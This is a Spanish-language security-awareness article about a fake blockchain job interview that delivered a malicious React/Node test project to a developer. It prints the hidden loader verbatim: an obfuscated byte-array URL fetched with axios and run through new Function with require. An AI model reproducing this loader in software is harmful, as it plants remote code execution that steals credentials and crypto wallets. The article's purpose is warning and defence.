Cuidado con esta estafa disfrazada de entrevista laboral dirigida a desarrolladores de software

Un desarrollador con 8 años de experiencia estuvo a 30 segundos de ejecutar malware en su máquina. El vector de ataque fue una entrevista de trabajo falsa de una «empresa legítima» de blockchain que casi lo engañó completamente.

La configuración perfecta

La historia comenzó con un mensaje de LinkedIn de Mykola Yanchii, quien se presentaba como Chief Blockchain Officer en Symfa. Empresa real, perfil real de LinkedIn con más de 1,000 conexiones. Todo parecía auténtico.

El mensaje era profesional y atractivo: «Estamos desarrollando BestCity, una plataforma destinada a transformar los flujos de trabajo inmobiliarios. Roles de medio tiempo disponibles. Estructura flexible.»

David Dodda, el desarrollador víctima de este intento de estafa, había trabajado durante 8 años como freelancer construyendo aplicaciones web y realizando revisiones de código. Se consideraba normalmente paranoico sobre seguridad – o eso creía.

El anzuelo profesional

Antes de la reunión, Mykola envió un «proyecto de prueba» – práctica estándar para entrevistas técnicas. Un código base de React/Node para evaluar habilidades. Una prueba de 30 minutos que parecía simple.

El repositorio de Bitbucket lucía profesional:

• README limpio
• Documentación apropiada
• Hasta tenía esa foto corporativa típica de una mujer con una tablet frente a una casa

El desarrollador admite que cometió el error que muchos programadores hacen: estaba llegando tarde a la llamada y tenía solo 30 minutos para revisar el código. Así que empezó a revisar el código sin ejecutarlo primero.

Normalmente usaba sandbox para todo – contenedores Docker, ambientes aislados. Pero tenía prisa.

Pasó 30 minutos arreglando bugs obvios, añadiendo un archivo docker-compose, limpiando el código. Trabajo estándar. Listo para ejecutarlo y mostrar su trabajo.

La salvación de último momento

Justo antes de ejecutar npm start, tuvo uno de esos momentos paranoicos de desarrollador.

Lanzó este prompt a su agente de Cursor AI: «Antes de que ejecute esta aplicación, ¿puedes ver si hay código sospechoso en este código base? Como leer archivos que no debería leer, acceder a billeteras crypto, etc.»

Y ahí estaba la bomba.

Sentado justo en el medio de server/controllers/userController.js había este código malicioso:

//Get Cookie
 (async () => {
 const byteArray = [
 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
 98, 50, 48, 51, 49, 102, 98, 57
 ];
 const uint8Array = new Uint8Array(byteArray);
 const decoder = new TextDecoder('utf-8');
 axios.get(decoder.decode(uint8Array))
 .then(response => {
 new Function("require", response.data.model)(require);
 })
 .catch(error => { });
 })();

Ofuscado. Sigiloso. Malévolo. Y 100% activo – incrustado entre funciones de administrador legítimas, listo para ejecutarse con todos los privilegios del servidor en el momento en que se accedieran las rutas de administrador.

Al decodificar ese array de bytes obtuvo: https://api.DOMAIN.io/2c458612399c3b2031fb9

Cuando accedió por primera vez a la URL, estaba activa. Capturó el payload. Malware puro del tipo que roba todo: billeteras crypto, archivos, contraseñas, toda tu existencia digital.

El detalle más inquietante: la URL murió exactamente 24 horas después. Estos tipos tenían su infraestructura configurada para quemar evidencia rápidamente.

La operación sofisticada

Este no era un trabajo amateur. Era sofisticado:

El perfil de LinkedIn

Mykola Yanchii parecía 100% real. Chief Blockchain Officer. Historial de trabajo apropiado. Incluso tenía esas publicaciones cursis de LinkedIn sobre «innovación» y «consultoría blockchain».

La empresa

Symfa tenía una página completa de LinkedIn. Branding profesional. Múltiples empleados. Publicaciones sobre «transformar bienes raíces con blockchain». Incluso tenían páginas afiliadas y redes de seguidores.

El enfoque

Sin banderas rojas en el acercamiento inicial. Lenguaje profesional. Alcance del proyecto razonable. Incluso usaron Calendly para programar.

El payload

El código malicioso estaba posicionado estratégicamente en el controlador del lado del servidor, listo para ejecutarse con todos los privilegios de Node.js cuando se accediera a la funcionalidad de administrador.

La psicología del ataque

Lo que hizo esto tan peligroso:

• Urgencia: «Completa la prueba antes de la reunión para ahorrar tiempo»
• Autoridad: Perfil verificado de LinkedIn, empresa real, configuración profesional
• Familiaridad: Prueba de codificación estándar para llevar a casa. Cada desarrollador ha hecho docenas de estas
• Prueba social: Página de empresa real con empleados reales y conexiones reales

La lección crítica

Un simple prompt de IA lo salvó del desastre.

No herramientas de seguridad sofisticadas. No software antivirus caro. Solo preguntarle a su asistente de codificación que buscara patrones sospechosos antes de ejecutar código desconocido.

La parte aterradora es que este vector de ataque es perfecto para desarrolladores. Descargamos y ejecutamos código todo el día. Repositorios de GitHub, paquetes npm, desafíos de codificación. La mayoría no hace sandbox de cada cosa.

Y este era malware del lado del servidor. Todos los privilegios de Node.js. Acceso a variables de entorno, conexiones de base de datos, sistemas de archivos, billeteras crypto. Todo.

La escala del problema

Si esta operación sofisticada está apuntando a desarrolladores a escala, ¿cuántos ya han sido comprometidos? ¿Cuántos sistemas de producción están ya dentro?

Targeting perfecto

Los desarrolladores son víctimas ideales. Nuestras máquinas contienen las llaves del reino: credenciales de producción, billeteras crypto, datos de clientes.

Camuflaje profesional

Legitimidad de LinkedIn, códigos base realistas, procesos de entrevista estándar.

Sofisticación técnica

Ofuscación multicapa, entrega de payload remoto, dead-man switches, ejecución del lado del servidor.

Una infección exitosa podría comprometer sistemas de producción en grandes empresas, holdings crypto por millones, datos personales de miles de usuarios.

Recomendaciones de seguridad

Si eres un desarrollador recibiendo oportunidades laborales de LinkedIn:

1. Siempre haz sandbox del código desconocido. Contenedores Docker, VMs, lo que sea. Nunca lo ejecutes en tu máquina principal.
2. Usa IA para escanear patrones sospechos. Tu asistente de IA puede detectar patrones maliciosos en segundos. No cuesta nada y puede salvarte.
3. Verifica todo. Un perfil real de LinkedIn no significa persona real. Una empresa real no significa oportunidad real. Cruza referencias y verifica información por canales independientes.
4. Confía en tu instinto. Si alguien te apresura para ejecutar código, es una bandera roja. Las empresas legítimas entienden las precauciones de seguridad.
5. Revisa las URLs ofuscadas. Cualquier código que convierta arrays de bytes a URLs es sospechoso por diseño. No hay razón legítima para ocultar endpoints de esa manera.
6. Cuidado con las pruebas técnicas con prisa. Los procesos de entrevista legítimos te dan tiempo adecuado. La presión por tiempo es una táctica clásica de ingeniería social.
7. Mantén ambientes separados. Tu máquina de desarrollo no debe tener acceso a billeteras crypto, credenciales de producción o datos sensibles.

La reflexión final

Esta estafa era tan sofisticada que engañó el detector inicial de BS del desarrollador. Pero un momento paranoico y un simple prompt de IA expusieron toda la operación.

David reportó el perfil a LinkedIn, pero no recibió respuesta. El perfil seguía activo al momento de escribir este artículo. La página de la empresa seguía funcionando. Probablemente ya están atacando a su próxima víctima.

Lo más aterrador de todo esto es la escalabilidad. Si esta operación está enviando estos «desafíos de codificación» maliciosos a cientos o miles de desarrolladores, ¿cuántos ejecutaron el código sin verificar? ¿Cuántas máquinas ya están comprometidas? ¿Cuántas credenciales de producción han sido robadas?

Los desarrolladores somos objetivos de alto valor. Tenemos acceso a infraestructura crítica, bases de datos de clientes, repositorios de código, billeteras corporativas. Una infección exitosa no solo compromete a un individuo – puede abrir las puertas a sistemas empresariales completos.

Y lo más preocupante: esta táctica funciona porque explota nuestro flujo de trabajo diario. Descargamos código constantemente. Ejecutamos scripts de configuración. Instalamos dependencias. Corremos servidores locales. Es nuestra rutina.

La próxima vez que alguien te envíe un «desafío de código», recuerda esta historia.

Tu billetera crypto, tus credenciales de AWS, y los datos de tus clientes te lo agradecerán.